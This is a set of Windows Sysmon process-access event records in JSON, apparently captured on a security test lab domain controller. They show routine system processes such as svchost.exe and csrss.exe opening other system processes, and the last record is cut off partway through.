{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6120,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.773\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-040E-5F25-0000-0010B6230B00}\r\nTargetProcessId: 4488\r\nTargetImage: C:\\Windows\\system32\\usoclient.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.773","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-040E-5F25-0000-0010B6230B00}","TargetProcessId":"4488","TargetImage":"C:\\Windows\\system32\\usoclient.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6121,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.789\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.789","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6122,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.789\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.789","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6123,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.789\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nSourceProcessId: 1144\r\nSourceThreadId: 2228\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-040E-5F25-0000-001064290B00}\r\nTargetProcessId: 4468\r\nTargetImage: C:\\Windows\\System32\\XblGameSaveTask.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|c:\\windows\\system32\\UBPM.dll+a711|c:\\windows\\system32\\UBPM.dll+f974|c:\\windows\\system32\\UBPM.dll+cd3c|c:\\windows\\system32\\UBPM.dll+d305|c:\\windows\\system32\\UBPM.dll+dc05|c:\\windows\\system32\\UBPM.dll+e91d|c:\\windows\\system32\\UBPM.dll+e12a|c:\\windows\\system32\\UBPM.dll+dd82|c:\\windows\\system32\\EventAggregation.dll+3e22|c:\\windows\\system32\\EventAggregation.dll+36c9|c:\\windows\\system32\\EventAggregation.dll+332f|c:\\windows\\system32\\EventAggregation.dll+2e28|C:\\Windows\\SYSTEM32\\ntdll.dll+64ed5|C:\\Windows\\SYSTEM32\\ntdll.dll+64bdd|C:\\Windows\\SYSTEM32\\ntdll.dll+64a40|C:\\Windows\\SYSTEM32\\ntdll.dll+45b70|C:\\Windows\\SYSTEM32\\ntdll.dll+2a073|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.789","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","SourceProcessId":"1144","SourceThreadId":"2228","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-040E-5F25-0000-001064290B00}","TargetProcessId":"4468","TargetImage":"C:\\Windows\\System32\\XblGameSaveTask.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|c:\\windows\\system32\\UBPM.dll+a711|c:\\windows\\system32\\UBPM.dll+f974|c:\\windows\\system32\\UBPM.dll+cd3c|c:\\windows\\system32\\UBPM.dll+d305|c:\\windows\\system32\\UBPM.dll+dc05|c:\\windows\\system32\\UBPM.dll+e91d|c:\\windows\\system32\\UBPM.dll+e12a|c:\\windows\\system32\\UBPM.dll+dd82|c:\\windows\\system32\\EventAggregation.dll+3e22|c:\\windows\\system32\\EventAggregation.dll+36c9|c:\\windows\\system32\\EventAggregation.dll+332f|c:\\windows\\system32\\EventAggregation.dll+2e28|C:\\Windows\\SYSTEM32\\ntdll.dll+64ed5|C:\\Windows\\SYSTEM32\\ntdll.dll+64bdd|C:\\Windows\\SYSTEM32\\ntdll.dll+64a40|C:\\Windows\\SYSTEM32\\ntdll.dll+45b70|C:\\Windows\\SYSTEM32\\ntdll.dll+2a073|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6124,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.789\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-040E-5F25-0000-001064290B00}\r\nTargetProcessId: 4468\r\nTargetImage: C:\\Windows\\System32\\XblGameSaveTask.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.789","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-040E-5F25-0000-001064290B00}","TargetProcessId":"4468","TargetImage":"C:\\Windows\\System32\\XblGameSaveTask.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6125,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.789\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.789","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6126,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.789\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.789","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6127,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.789\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.789","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6128,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.789\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 